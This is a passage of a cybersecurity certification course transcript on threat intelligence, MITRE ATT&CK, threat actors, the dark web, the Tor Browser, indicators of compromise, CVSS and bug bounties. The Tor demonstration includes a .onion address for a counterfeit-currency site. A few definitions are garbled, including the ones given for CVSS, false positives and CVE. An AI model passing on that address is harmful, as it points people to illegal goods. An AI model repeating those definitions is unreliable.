consultant, as well as an IT tech author and editor. I've held and still hold IT certifications related to Linux,
Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have included networking, IT
security, cloud solutions, Linux management, and configuration and troubleshooting across a wide array of
Microsoft products.
The CS0-002 CompTIA Cybersecurity Analyst or CySA+ certification exam is designed for IT professionals
looking to gain security analysts' skills to perform data analysis; to identify vulnerabilities, threats, and risks to
an organization; to configure and use threat detection tools; and secure and protect an organization's
applications and systems.
In this course, we're going to explore ways for security technicians to keep up-to-date with the latest IT
security threats. I'll start by examining various security intelligence sources and how to use the MITRE
ATT&CK knowledge base. I'll then examine threat intelligence collection, threat classification for
prioritization, and different sources and motivations of IT threats.
Next, I'll explore the dark net and I'll demonstrate how to install and use the Tor web browser. I'll continue
with an examination of threat positives and negatives, threat indicator management, and threat modeling.
Lastly, I'll explore the Common Vulnerability Scoring System, or CVSS, security levels and commonalities
shared amongst bug bounties.
[Video description begins] Topic title: Sources of Intelligence. Your host for this session is Dan
Lachance. [Video description ends]
Threat intelligence is all about having the required information so that you can prevent attacks or even reduce
the impact that attacks have on a business. [Video description begins] Slide title: IT Security Intelligence
Sources. [Video description ends] This includes at the government level and also intelligence sources from the
private sector. At the government level, there are some cybersecurity knowledge bases; for example, from the
Department of Homeland Security in the United States, as well as the FBI.
On the private sector side, we've got different institutions like the SANS Institute, OWASP, and even antivirus
vendor websites that provide a wealth of intelligence sources. There are also many open-source IT security
intelligence sources, including the SANS Institute. This is a U.S. company that is in existence for the purposes
of providing information about information security.
Then there's the Common Vulnerability Scoring System, or CVSS. Now this is a free website that is used by
IT security professionals to take a look at the most recent threats. Of course, you can go back in time and look
at old threats as well. And CVSS uses a severity rating level so that you can take a look at, for example, only
the most severe recent IT threats. That way, you can prioritize your organization's response to them.
Then there's the Center for Internet Security. This is another nonprofit type of website that its purpose is really
to provide IT security information to technicians. [Video description begins] Center for Internet Security has
been abbreviated to CIS. [Video description ends] Then there's the National Institute of Standards and
Technology, or NIST. The NIST has a lot of different standards documentation. Not all of them are related to
security. But NIST does have a cybersecurity framework available.
And finally, we've got the Open Source Security Information Management, or OSSIM, as another intelligence
source. This is really a collection of tools that are designed for security professionals that are related to IT
security and intrusion detection.
Now from your own network environment, which includes cloud deployments, there are plenty of sources for
IT security intelligence that are customized to your environment. It really comes in the form of things like
server logs; user device logs, such as from smartphones; network device logs; cloud service logs; past incident
reports; public and private entities that might have access to your network and logs related to that type of
activity; captured network traffic; vulnerability assessments that might be conducted periodically to identify
weaknesses in your environment; penetration test results which are used to exploit discovered vulnerabilities;
and finally, IT security audit reports. All of these provide a wealth of information.
But this is only going to be very useful if it's compiled and analyzed centrally, so that we have some kind of a
tool that can analyze the data looking for indicators of compromise. The logs unto themselves are useless
unless we use them in a specific manner. Now there are a couple of different IT security intelligence data
formats that are standard in the industry, one of which is called STIX, S-T-I-X. The other is called TAXII, T-
A-X-I-I.
Let's start with STIX. This stands for Structured Threat Information eXpression. And it deals with storing
information about threat actors and incidents that have occurred as well as indicators of compromise and also
the tactics employed by adversaries to run attacks; so has details about exploits. It's a common language that's
used to describe cybersecurity threats. Now it also involves information about taking a course of action to
mitigate those threats.
TAXII stands for Trusted Automated eXchange of Indicator Information. Now this is a method of exchanging
cybersecurity data that's been formatted, for example, using the STIX format. So we have a number of
different mechanisms then that we can use to learn about threats, so we can reduce their impact and then how
to document information about them and then exchange that information to help other organizations and
individuals.
In this video, learn how to use the MITRE ATT&CK knowledge base.
Objectives
Effective IT security specialists are up-to-date with the latest threats and tactics and techniques used by
adversaries to compromise systems and exfiltrate sensitive data. Now one source is the attack.mitre.org
website. [Video description begins] The website has a menu bar, which includes the following menus: Tactics,
Techniques, Mitigations, etc. [Video description ends]
As it says on the landing page, this is a globally-accessible knowledge base of adversary tactics and techniques
based on real-world observations. This is an absolute wealth of information. If this is not something that you've
spent some time on, you need to allocate time spent here. This will help you personally as your career within
the IT security field. But it will also help the organization you are working with to help prevent and
countermeasure attacks.
So the first thing we might look at here on the MITRE ATT&CK website is to go under Tactics. So we can
look at PRE-ATT&CK. PRE-ATT&CK would be reconnaissance type of items. And we see a lot of directions
related to this. So first of all, we see PRE-ATT&CK Tactics.
[Video description begins] The PRE-ATT&CK web page that opens displays a PRE-ATT&CK Tactics table
with the following columns: ID, Name, and Description. Several tactic name links are listed in the table. Also,
the page includes a PRE-ATT&CK drop-down menu in the navigation pane. The menu contains the following
categories: Priority Definition Planning, Target Selection, Technical Information Gathering, etc. [Video
description ends]
And on the left, we have a navigator; keeps changing as we navigate through the site. For example, if I were to
click on Target Selection, we see some details related to selecting an attack vector for a target victim network
or host. [Video description begins] The "Target Selection" category includes a "Techniques" table with the
following columns: ID, Name, and Description. A few technique name links, including Determine
approach/attack vector, are listed in the table, [Video description ends]
We also see Technical Information Gathering. If I click that and scroll down, things like Conduct active
scanning to send transmissions to end nodes to see who responds. And then to further perhaps dig deeper, to
see if there are any vulnerabilities present on those devices that can be exploited. [Video description
begins] The "Technical Information Gathering" category includes a "Techniques" table with the following
columns: ID, Name, and Description. Several technique name links, including Conduct active scanning, are
listed in the table, . [Video description ends]
Then we've got Techniques and Mitigations. [Video description begins] The presenter points to the
"Techniques" menu and the "Mitigations" menu in the menu bar. [Video description ends]
So down here, we can see there are techniques. And again over on the left, we've got a change in navigation
bar. So let's say, Lateral Movement within the network. [Video description begins] The "Lateral Movement"
category includes a "Techniques" table with the following columns: ID, Name, and Description. Several
technique name links, including Exploitation of Remote Services, are listed in the table. [Video description
ends]
So it explains lateral movement and some of the techniques that have been observed out in the wild, so to
speak, as to how this has been done. So by exploiting remote services, we can dig deeper and learn more about
that.
Now we can also go here under Techniques and this time I'll choose Mobile as opposed to Enterprise – so
mobile technologies. As we go through here, we can see we've got a lot of items listed. Again, it's kind of
categorized on the left in the same way. So let's say, Command and Control. Here it talks about what command
and control, or C and C, is all about and the techniques used by malicious users to further their cause when it
comes to infiltrating malware on devices so that they can create a botnet. In other words, the bots or the
infected devices report back periodically to command and control servers to retrieve commands on what they
should do.
Of course, we've also got Mitigations at the top – very important. So if we go at the Enterprise level, for
example, the first thing we see here is Account Use Policies. Configure features related to account use like
login attempt lockouts, specific login times that should be allowed in your organization. A lot of this is
hardening strategy. [Video description begins] On the Mitigations menu, when he clicks Enterprise, the page
that opens includes an "Enterprise Mitigations" table with the following columns: ID, Name, and Description.
Several enterprise mitigation name links, including Account Use Policies, are listed in the table. [Video
description ends]
So if I click on Account Use Policies, we can see more details related to that and the techniques that are
addressed by mitigation such as brute forcing – password attacks against user accounts. We've also got the
Groups here. [Video description begins] With him selecting the Groups option, the page that opens contains
the following categories in the navigation pane: Overview, APT1, Gallmaker, etc. Currently, Overview is
selected. [Video description ends]
These are groups of known malicious users. For example, if I click APT1, says here it's a Chinese threat group
that has been attributed to a number of attacks. And we can scroll down to learn more about that. So we've got
an entire list here on the left of known threat groups around the world. We can click on any one of them to
learn more about them. So Gallmaker, for example, cyberespionage group that has targeted victims in the
Middle East since 2017.
And we can scroll down and learn about that, as I'm sure you can see, absolutely crucial to spend some time to
learn about tactics, techniques, and mitigations here, as well as looking at blog entries. [Video description
begins] When he selects the Blog option from the menu bar, a new "MITRE ATT&CK - Medium" tab opens in
the web browser. [Video description ends]
Now when you look at the blog entries, you'll see that there are a lot of interesting items available here such as
launching ATT&CK for ICS, Industrial Control Systems. [Video description begins] He selects the
"Launching ATT&CK for ICS" blog post. [Video description ends] Because there's been a spike in the interest
for this in past years. And then, of course, it can ask us to log in using third-party providers, which I will not
do. So there's a real wealth of information that all IT security specialists should spend some time on if they've
not spent time here already.
[Video description begins] Topic title: Intelligence Collection. Your host for this session is Dan
Lachance. [Video description ends]
Threat intelligence collection is a lot more than simply reviewing the latest security threats from security
websites online. It also involves looking inside at your own network environment and the logs collected from it
and then analyzing it. So this means that we want to collect this threat intelligence so that we can minimize the
impact of realized threats should they occur. Threat intelligence collection is also important, so we can predict
future attacks where possible. It also feeds into proactively planning for incident response should those threats
be realized.
And a big part of this these days is machine learning, often simply abbreviated as ML. Now this means
analyzing vast amounts of data from different sources – in other words, big data. So we might gain a lot of
insight by compiling historical security incident information together in conjunction with current threat
information, maybe, specific to your industry and then running machine learning against it to look for
indicators of compromise or looking at the likelihood of that threat being realized in your specific
environment.
Now the first order of business with threat intelligence collection is to determine which threats must be
mitigated. That's only going to be possible after you've done what we've just previously discussed – when
you've taken a look at intelligence sources and run analytics against it to see which threats are the most likely.
Because that's where you want to spend resources. So then we'll know which threats need to be mitigated, after
which we can start collecting data related to that.
So maybe if we're looking at threats related to network distributed denial-of-service attacks, we could look at
logs on individual hosts for indications that malware might have been planted on those devices or that routers
might have been probed from the public-facing Internet. We can also look at our incident response plan to deal
with those situations. And again, we can also collect data from public sources about known adversary tactics
that might be used, let's say, in executing a distributed denial-of-service attack.
The next thing we have to think about is processing that collected data. Now processing data in this aspect
really means formatting it appropriately or filtering out the noise for things that are not relevant. In order to
filter out what's not relevant or what's normal, you have to have established a baseline of what's normal. Then
it's pretty easy to know what is not normal.
After analyzing the data in detail, because we filtered it already, we can then configure our machine learning
tools or it might be done automatically to look for indicators of compromise. An example of this might be the
fact that we've got the presence of new Linux hosts on the network that weren't there previously. And we didn't
even use Linux.
The next thing is to disseminate or share those findings and then have feedback on them, which feeds back into
the original, which threats must be mitigated. This is an ongoing cycle, this is not a one-time activity. And one
of the ways that you can deal with the machine learning to go through these vast amounts of data looking for
indicators of compromise is to use machine learning services available through the cloud. That way you don't
have to acquire and configure all the underlying infrastructure to allow for that large-scale data analysis.
[Video description begins] Topic title: Classifying Threats. Your host for this session is Dan Lachance. [Video
description ends]
Security technicians have limited time to make an impact on reducing threats against the organization. And
classifying threats is one of the ways to even save more time. Because classifying threats lets you prioritize
those threats that will have the largest likely impact and then focus on those threats and mitigating them.
So there are varying types of damage impacts that we have to consider. That would include things such as
leaked trade secrets or the compromising of customer financial records if we're in that type of business or
perhaps the leakage of national security secrets from the government level or even data files that get encrypted
on user devices with ransomware. And also we have to think about the damage that might be related to a
compromise through remote access to critical infrastructure networks related to electricity, water, or aviation.
So needless to say, classifying threats is a big deal. So we focus our energy where it's needed the most.
The cyber kill chain is really a reference to looking at some kind of a compromise or attack from beginning to
end. So starting at the reconnaissance techniques that might have been used by attackers initially and then
tracing the techniques that were used to compromise a system or to execute some kind of an attack. [Video
description begins] The following information is displayed on screen: Trace system/data compromise
techniques. [Video description ends]
And then we can learn a lot from this so that we can anticipate and mitigate future attacks of the similar nature.
The classifying threats will result in things like known threats. Now classifying a threat as known usually
means that we have either documented it through our own log analysis or that it's already known by other
cyberintelligence sources that we subscribe to.
Unknown threats are called zero-day. Now with the zero-day is a serious issue because it often will mean that
there is an exploit that can be used, let's say, to break into an operating system and the operating system vendor
isn't even aware of it yet or there is no fix for it. As you might imagine, on the dark net, zero-day exploits are
worth a lot of money for malicious users.
Other threats would include denial-of-service, DoS, or distributed denial-of-service, D-D-o-S or DDoS,
attacks. A DoS attack is simply anything that can render a service unusable for legitimate purposes by
legitimate users. That could even include something as unsophisticated as unplugging the power for a server
physically. A DDoS is a little bit different. Where the 'distributed' comes in is that we've got a number of
computers that are normally infected with malware under singular malicious user control that can be given
commands, for example, to flood a target network with useless traffic.
Then we've got advanced persistent threats, or APTs. Now this one is interesting because an advanced
persistent threat essentially means that we've got a compromise that's been used to gain access to a system or
an entire network, that goes unnoticed for a period of time. Now think back to 2017 as related to the Equifax
data security breach where, reportedly, there were more than 140 million American consumers that had their
credit history compromised in some way. Now this was related to an Apache web server component flaw that
was exploited.
And what's interesting about this is that the attackers were able to get into the Equifax environment in March
of 2017. However, the attackers were able to stay in the network undetected for more than 70 days. They didn't
get detected. Now this was an exploit that was known out on the Internet and there were notifications or
advisories that were set out. It simply means that Equifax had not applied the fix to this Apache flaw. So
classifying threats is going to be important then so that we know where to focus our energy on the most likely
of threats.
Upon completion of this video, you will be able to recognize different sources and motivations for IT threats.
Objectives
[Video description begins] Topic title: Threat Actor Types. Your host for this session is Dan Lachance. [Video
description ends]
An important aspect of minimizing the impact of a realized threat is to be aware of threat actors. Threat actors
are the entities that are responsible for a security incident, whether it's a malware infection or a DDoS attack.
Whether that incident was intentional or not does not matter. The fact remains that the entity is still a threat.
They present some kind of a risk.
Now there are many different types of threat actors, including hacktivists and insiders within the organization.
Hacktivists try to promote some kind of an ideology, whether it's based on a political agenda or religious. Now
normally, their activities are not attempted to be hidden. They're not hidden, they're not stealth. An example of
a hacktivist type of attack might result in a DDoS attack or website defacement to get their message known, to
get their message across, or taking over social media accounts to control the feeds.
An insider threat could be either intentional, such as with a disgruntled employee. But often, it's unintentional,
such as with users clicking attachments in phishing e-mail messages or users plugging in USB storage devices
that are infected with malware. And so now that malware is on the inside and might even potentially spread
over the network if it's a worm type of piece of malware.
Other threat actors would include organized crime and nation state. Organized crime have a large reach over
the Internet to potential victims. Now it also includes low risk because there are many ways to make an
anonymous connection, especially through the dark net or the dark web. So it becomes very difficult, if not
impossible, for law enforcement to trace the origin of this kind of organized crime activity.
Then there's the payment side. If some kind of cryptocurrency like Bitcoin is used as a payment, it becomes
very difficult to trace those transactions. [Video description begins] The following information is displayed on
screen: Untraceable payment (Bitcoin cryptocurrency). [Video description ends]
Nation state means that the threat actor is supported by some kind of a government – it's government funded.
And usually, the target is another government or some kind of national activity that the primary government is
not in agreement with. Examples of nation-state-sponsored type of attacks, so from a nation state threat actor.
You might remember, back in 2010, the Stuxnet worm that allegedly was designed by the United States and
Israel against Iranian nuclear enrichment plants for, specifically, for uranium enrichment. The Stuxnet worm
was designed to look for a specific model of Siemens centrifuge to destroy it essentially.
Then there's the alleged U.S. attack that disabled Iranian weapon systems in 2020. So none of these have been
proven. But it still brings to mind that there could be some well-funded nation state type of attacks that are
motivated by governments in one country going after governments in another country.
[Video description begins] Topic title: The Darknet. Your host for this session is Dan Lachance. [Video
description ends]
When most people think of the Internet, they think of what they get through their news feeds, through their
social media feeds, and what they can search for and get results on using their favorite search engine. Truth is
the Internet is much, much larger than that. The dark net or the dark web is a part of the Internet that you can
access anonymously.
You can make anonymous communications through the Tor network. This is one way to do it. Tor, T-o-r,
stands for the onion router. And it's part of an anonymous way to access content on the Internet, where
cryptocurrencies are used to pay for illegal products and services. Now bear in mind, when you are on the dark
net or the dark web, you can still use tools to access legitimate standard websites you might access normally.
But you also potentially could access some scary stuff.
Now the dark net or dark web has contents, web pages that are not indexed or crawled by popular search
engines like Google or Bing or Baidu if you're in China searching for content. So because the content isn't
readily available, it's a little bit harder to get at. And on the dark web, many users will use pseudonyms. They
won't use their real names because they want to remain anonymous. [Video description begins] The following
information is displayed on screen: Dark web users use pseudonyms. [Video description ends]
Now there are many illegal items and services available on the dark web, like credit card dumps. These are
collections of stolen credit card information for sale to the highest bidder. There are also botnet and hacker
service rentals. A botnet is a collection of computers under singular malicious user control. And you can rent
out a botnet for a period of time. Or you can rent the services of a hacker to execute some kind of an attack.
This is possible.
You can also acquire forged documents, including passports or drivers' licenses. You can also acquire drugs,
illegal drugs; weapons; child pornography. You can even hire assassins. This is all, it sounds unbelievable, but
it's all absolutely available on the dark web. Now the Silk Road is a good example of the dark web. It existed
online from 2011 to 2013. And we have a screenshot here that talks about accessing the site by using the Tor
web browser.
Now when you use the Tor web browser, you access very-difficult-to-remember URLs. So not friendly names
like www.buyguns.com. It would never be that easy. So you have unindexed or unsearchable content. So you
have to dig quite a bit to find specific items on the dark net. But the Silk Road was a site where you could buy
drugs and weapons and so on. Essentially, it was a black market available on the Internet. Buyers and sellers,
of course, have to deal with payments, and that was often done using cryptocurrencies like Bitcoin.
Now the dark net and the dark web, as you might imagine, have many nasty usages – drugs, illegal file sharing,
even censorship bypass. Now think about using, for example, Facebook if you're a Chinese citizen residing
within China. Now Facebook and Facebook Messenger are blocked by the so-called Chinese Great Firewall
that filters content and access to certain apps.
However, you could use censorship bypass. In other words, you could use the Tor network to make a
connection to resources that are normally unavailable, such as Facebook from within China. So it really serves
another purpose, which would be citizen protection from state surveillance regardless of whether you're in the
United States, Canada, Europe, China, India. It doesn't matter where you are. But that is a legitimate way to
use the dark net or dark web. It's not always about the bad stuff although the bad stuff certainly does exist.
Another great way that the dark net or dark web can be used is through journalism, to send encrypted
communications for news stories. And also whistleblowing. So there are many different ways that the dark net
or dark web can be used. Like most things in life, how we use it determines whether it's bad or good.
[Video description begins] Topic title: The Tor Web Browser. Your host for this session is Dan
Lachance. [Video description ends]
The Tor web browser is but one tool that you can use to access resources on the dark net or the dark web, as
well as on the standard Internet that is indexed by standard search engines like Google and Bing. So here, I've
gone to torproject.org/download. I'm just doing this using a regular browser, in this case, Google Chrome.
And down below, I can download the installer for Windows, for macOS X, for Linux, or for Android devices.
So we've got a lot of listings here that are available and a lot of details as we scroll down the web page. So I'm
going to go ahead and download and install the Tor web browser for the Windows platform. Now the first time
you launch the Tor browser, it's going to make an anonymous connection to the Tor network. So it's just like
having a regular web browser. [Video description begins] A web browser titled "Tor Browser" opens. [Video
description ends]
And if you type in a standard site like www.cnn.com, standard sites will work. However, on the Tor network,
bear in mind that you're going to be connecting to a lot of difficult-to-remember URLs that will only work
when you're connected to the Tor network and nowhere else. Here we can see that the CNN website indeed did
pop up okay in the Tor web browser. Let me just paste in another URL here. [Video description begins] The
presenter pastes the following URL: qkj4drtgvpm7eed.onion. [Video description ends]
It's a strange-looking URL. We'll give it a moment to load the page. And it pops up a page here for counterfeit
US dollars currency. And that sounds illegal. Well, it would be. But let's try that same URL in a normal web
browser like Google Chrome. Here in Google Chrome, try as I may, when I enter in that URL, it doesn't know
what I'm talking about. Because I'm not connected to the Tor network when I use a standard browser like
Chrome. [Video description begins] The information that the web browser displays includes the following:
This site can't be reached. [Video description ends]
So the thing to watch out for is when you are using the Tor Browser and you are connected to the dark net, be
very careful what you look at or what you click on. Because there is some stuff there that's illegal that could
land you in trouble. So beware.
discuss true positives and negatives as well as false positives and negatives
[Video description begins] Topic title: Threat Positives and Negatives. Your host for this session is Dan
Lachance. [Video description ends]
As a security technician, you will have to constantly deal with threats. Now threat positives and negatives are
the result of having tools in place that can alert you as to whether something bad is happening or not. So we're
talking here about false positives, true positives, false negatives, and true negatives. Now knowing when to
take action or to respond on alerts is key in saving time and solving security problems quickly.
Let's talk about each of these in more detail. So we've got threat positives and threat negatives. A threat
positive is also called a false positive in this particular case. This means that we've got a benign item or activity
that is incorrectly identified as malicious. So it might have tried to positively say there's a security incident
here when, in fact, there is not. Hence, false positive. Now this wastes IT system and personnel time.
A true positive means that we've got correctly identified malicious items such as malware or activity such as
suspicious network spikes on the network and it triggers an alert. So that is when our intrusion detection and
prevention systems, for example, are working well. And it's important to tweak the specific solutions that you
use to identify threats so that you minimize false positives. Again, it's a waste of time.
Now then we've got negatives. A false negative means that we've got a configuration that does not detect
malicious items or activity. [Video description begins] The following information is displayed on screen:
Current configuration does not detect malicious item/activity. [Video description ends] Now let's think about
that. That means that we might have had some kind of attack that occurred but we didn't in our configuration
have a way for it to be detected. So hence, false negative. It did not detect malicious items or activity.
A true negative means that we aren't getting any alerts since there are no problematic or security conditions
that are present. So it's important to be able to know the difference between these positives and negatives.
Now what can we do to eliminate false positives, because we've already identified the fact that it's a waste of
time and security technicians are busy enough as it is? Well, one way to reduce false positives is to feed all of
your data sources that you might use for intrusion detection – could be server and mobile device logs and
intrusion sensor logs out on the network.
You need to make sure that those are using some kind of a data analysis and machine learning solution. Well,
not that they are using it but that the data is fed into a central location such as the cloud where data analysis
and machine learning are applied to those data sets. Now from there, you can have anything that's filtered out
to not be important as white noise. You don't worry about it. But that any incidents that might be raised, you
could have available through centralized monitoring systems such as a SIEM, S-I-E-M, system.
Now the way that this is going to work to be effective is to not look at individual events from your data sources
such as server logs but rather a correlation of events over time that might point to suspicious or anomalous
activity. You can't decide what's anomalous until you first decide what's normal. You need to establish a
baseline of normalcy in your environment in order for this to truly be effective.
So data correlation then will add context to a potential security event. This means we end up with less wasted
IT system resources and less wasted personnel time on things like false positives. This way, we can have our
IT technicians focus more on actual malicious activity that poses a threat to the organization.
[Video description begins] Topic title: Threat Indications. Your host for this session is Dan Lachance. [Video
description ends]
To effectively protect an organization from IT security threats, we need to have a way to have reliable threat
indications. These are called Indicators of Compromise, or IoCs. An Indicator of Compromise is an event or
even a correlation of events outside of normal host or network behavior that are detected after they have
occurred. And so, to determine what's abnormal, you have to establish a baseline of what is normal.
Configuring any type of intrusion detection or prevention system is going to require effort on the part of the IT
security team. It's not just a one-size-fits-all solution that you plug into the network and away we go. You can
do that but it won't be as effective as it otherwise could be. It needs to be customized for your environment so
that it knows what's normal. So IoCs then can be used to improve malware and attack activity detection and
how the IT security teams respond when those threats are realized.
Examples of Indicators of Compromise, or IoCs, might include login during irregular hours. For that to be
figured out, the system has to know what's regular. Also, unauthorized devices on the network. Well, to know
that, your solution is going to have to have a sense of what normally should be on the network.
Abnormal network traffic spikes or CPU utilization. You know where I'm going with that. You have to
establish what's normal for network traffic and CPU utilization. And unusual network traffic patterns such as
large bulk amounts of messages sent from internally out to an outside URL over port 443 in the middle of the
night. That could be an indication of a botnet compromise where the infected bots are talking to the command
and control server through port 443. Although it doesn't have to be that port. That's just an example.
And so it's important to document your indicators of compromise. This is important both within and outside of
the organization. It allows sharing of known threats. It can help others within your organization and outside of
it with incident response and containment and, of course, eradication. So really, it's documentation and sharing.
And there are standards for this that we've mentioned, such as Structured Threat Information Expression,
STIX, and also the exchange of that represented security threat information through Trusted Automated
Exchange of Indicator Information, otherwise called TAXII. [Video description begins] Structured Threat
Information Expression and Trusted Automated Exchange of Indicator Information have been abbreviated to
STIX and TAXII, respectively. [Video description ends] And there are many other ones, including the OpenIOC
framework. OpenIOC is simply a standard method of describing the result of analyzing malware.
[Video description begins] Topic title: Threat Modeling. Your host for this session is Dan Lachance. [Video
description ends]
Threat modeling begins with identifying threats, whether those are internal, within the organization, or
external. From there, we can then look at the threat likelihood and the impact that the threat would have on the
business. Now by prioritizing those with the highest impact, we then have more of a focal point for the threats
that we really need to apply countermeasures against. So we can implement the most feasibly effective threat
mitigation. So this is very important – to hunt down threats and then to model through these three steps – so
that we can focus on those threats that present the biggest risk.
Now questions that we would have to ask would be things like, who are the potential attackers? In other words,
who are the threat actors? The other thing, what do the attackers want? Are they looking simply to break into a
corporate network and deface a website? Are they looking at financial gain through stealing credit card
numbers? What are they after?
The other one is, how will they attack? So what will they do? Will they run vulnerability scans? Well, that's
usually the first part of reconnaissance to discover weaknesses. That's actually what happened in the 2017
Equifax data security breach. And the next item to consider is, how can the attack be mitigated? Well, that
would include things like hardening – by making sure that the latest patches are kept up with so that we can
close out any potential vulnerabilities that might be exploited by attackers.
With threat modeling, you need to identify assets that need to be protected. Whether it's customer databases,
you might have replicas distributed in different parts of the world of that database. You have to look at
functional requirements of the organization's business processes, such as with customer relationship
management tools that you might run on-premises or in the cloud.
The business objectives need to be identified. Now the business objectives are important because any IT
solutions that are in use need to align with business objectives. Otherwise, we're wasting time and resources on
IT solutions that don't serve the interests of the organization. Then there's compliance with regulations. And
also at the software development level, with threat modelng, developers need to apply a security mindset to all
phases of the Software Development Life Cycle, or SDLC – from the initial design phases all the way through
to the coding and the testing and the eventual deployment of the solution.
There are many tools out there that you can use to actually work with GUI threat modeling, such as the
OWASP Threat Dragon project. Now this is free. Everything from OWASP, the Open Web Application
Security Project, is free and open-source. This is a threat modeling tool that you can use as a standalone
desktop app in Windows, Linux, and the Mac OS.
[Video description begins] Topic title: Common Vulnerability Scoring System. Your host for this session is
Dan Lachance. [Video description ends]
The Common Vulnerability Scoring System, otherwise called CVSS, is important for IT security professionals
because it provides a way to allocate or assign a score to a vulnerability. The higher the score, the bigger the
threat and thus it allows technicians to prioritize one threat over another. One implementation of this is the
National Vulnerability Database, or NVD.
Here, I've gone to nvd.nist.gov/vuln, for vulnerabilities. [Video description begins] The NVD website has the
following categories in the navigation pane: General, Vulnerabilities, Vulnerability Metrics, etc. [Video
description ends] Now with Vulnerabilities on the left, I can click the plus sign to expand that. [Video
description begins] The expanded "Vulnerabilities" category contains the following subcategories: Search &
Statistics, Full Listing, Categories, etc. [Video description ends]
And I could look at a Full Listing or Categories. So let's start with Full Listing. [Video description begins] The
"Full Listing" web page that opens displays several years. And displayed below each of the years are the links
to the corresponding months. [Video description ends] Now we can choose a specific month; let's say, January
of 2020. And here we have a lot of CVEs. [Video description begins] The "January 2020" web page that
opens includes several CVE links. [Video description ends]
Now CVE stands for common vulnerability and exposure. And each of them has a number. And if I click on
one of these CVE items for January of 2020, it gives me a description. In this case, it's related to a cross-site
scripting, or XSS, vulnerability in a specific web app component. And as we go down below, we can see the
severity – that's the result of the Common Vulnerability Scoring System here – has been set at 5.4. So it's a
medium type of threat. And down below, we have a lot of references, including links, to advisories and even in
some cases patches that can be applied to close that vulnerability.
Now let's go back in our web browser. We were looking at the vulnerabilities part of NVD. We're looking at
the Full Listing. But I can expand with the plus sign under Vulnerabilities and choose other items like
Categories. So if we take a look at the categories, then we can scroll down and start to take a look at different
aspects of threats that we might be interested in, such as Authentication Bypass by Spoofing.
[Video description begins] The NVD CWE Slice web page that opens includes a table with the following
columns: Name, CWE-ID, and Description. Several records appear in the table. These include CWE-290, with
CWE-ID listed as the "Authentication Bypass by Spoofing" link. [Video description ends]
I'm just going to go back under Vulnerabilities again, and this time I'll choose Search & Statistics. Sometimes
you don't have the time to scroll through everything. You just need to find out something about a particular
component or protocol or setting.
[Video description begins] The "Search Vulnerability Database" web page that opens includes a "Search
Type" heading, a "Results Type" heading, a "Keyword Search" Search box, a "Search Type" heading, and a
"Search" button. The "Search Type" heading has two options: Basic and Advanced. Basic is selected. The
"Results Type" heading has two options: Overview and Statistics. Overview is selected. The "Search Type:"
heading has three options: All Time, Last 3 Months, and Last 3 Years. All Time is selected. [Video description
ends]
So let's say, I look for remote desktop protocol, RDP. So this normally listens on port 3389 to allow remote
GUI management of the Windows hosts. And I want to look for remote desktop protocol issues, let's say, in the
last three months. [Video description begins] After typing "remote desktop protocol" in the "Keyword Search"
Search box, the presenter selects the "Last 3 Months" option under the "Search Type" heading. [Video
description ends]
So I'll click Search. And we can see that, well, immediately the CVSS, the Common Vulnerability Scoring
System, severity here is at a high, okay, at least for version 3.1. [Video description begins] The "Search
Results" page that opens includes a table with the following columns: Vuln ID, Summary, and CVSS Severity.
A few Vuln ID links are listed in the table. The application displays the CVSS severity levels for V3.1 and V2
for each of the Vuln ID links. [Video description ends]
So it talks about the nature of the issue and when it was published. And we can click the CVE link on the left
to get more details about the problem. [Video description begins] After pointing to the entries in the CVSS
Severity column and the Summary column, when he clicks the associated Vuln ID link, the corresponding page
that opens includes a table with the following columns: Hyperlink and Resource. A single hyperlink is listed in
the table. The web page also includes a "Known Affected Software Configurations" section. Each of the
configurations in the section has a Show Matching CPE(s) drop-down list. [Video description ends]
And then down below, we can see, for example, that there is a link here with a patch. So one of the resources
here to address this security issue is a patch that can be applied. And down below, we can see Known Affected
Software Configurations. So we can see the listing here for the version of Windows such as Windows 10. We
can even look at any other related vulnerabilities for that particular software version. So as you can see, the
National Vulnerability Database is a great way to look for any vulnerabilities that you think might be an issue
in your environment by using the Common Vulnerability Scoring System, or CVSS, to prioritize those threats.
[Video description begins] Topic title: Bug Bounties. Your host for this session is Dan Lachance. [Video
description ends]
If you're a skilled computer programmer and IT security specialist, you could make money through bug bounty
programs. That's not what it's really about. From the perspective of the company paying a bug bounty, it allows
them to tighten up the security for their product or service when ethical hackers discover and report these
vulnerabilities.
Here in my web browser, I'm going to use a search engine to search for, let's say, bug bounty – just by itself.
And immediately, we can see we've got a lot of returned hits. For example, how much do bug bounty hunters
make? And it talks about what they could earn annually from bug bounties. However, as we scroll further
down, we can also see there are open-source bug bounty programs where you can search for specific bug
bounty types. So we can look at specific products and services available from very big name companies or you
could simply search them out.
So for example, let's say, we search out bug bounty department of defense. Let's see what we get here. Okay,
looks like we've got Department of Defense Expands 'Hack the Pentagon.... Now remember, this is in the
interest of the government agency or the company to tighten down their product, service, or website. And there
are a lot of details about this. Not all bug bounty programs will pay a reward.
Let's just go back out here. And maybe we'll search for bug bounty, let's say, a company like Grammarly. And
let's click on the Grammarly - Bug Bounty Program description, where we're going to see, for example, how
many reports were resolved. And we can see the average bounty here is between $150 and $200. Presumably,
that's in American currency. And we can see that for critical flaws, the payment could be all the way up to
$10,000.
However, there are rules of engagement for both parties as we scroll down. Rules for us – in this case for
Grammarly – and then Rules for you. That would be the ethical hacker and what you're testing and how you're
looking for vulnerabilities. We have a lot more details about the rewards and how they will be paid if it's a
previously unknown vulnerability that you, the ethical hacker, might have discovered.
So it's just something to be aware of – the fact that bug bounties exist for some of the largest companies on the
planet. And it's not to be looked at with a suspicious eye but rather they should be applauded since they are
taking active steps to close security problems in their products and services.
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined security threats, including how IT security technicians can stay up-to-date
with the latest threats. We did this by exploring security intelligence sources and the use of the MITRE
ATT&CK knowledge base. We talked about threat intelligence collection and threat classification for
prioritization of threats.
We looked at different sources and motivation for IT threats. And we talked about the dark net, otherwise also
called the dark web. Then we looked at how to install and use the Tor web browser to access dark net
resources. We looked at threat positives and negatives, threat indicator management, and threat modelling.
And we talked about the Common Vulnerability Scoring System, or CVSS, and its security levels.
And finally, we talked about commonalities shared amongst bug bounties. In our next course, we'll focus on
business continuity where we explore policies, procedures, and controls to help in planning secure IT systems
and data as well as incident response reviews to improve future incident handling.
Table of Contents
Objectives
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus CompTIA, and Microsoft. Some of my specialties over the years have included
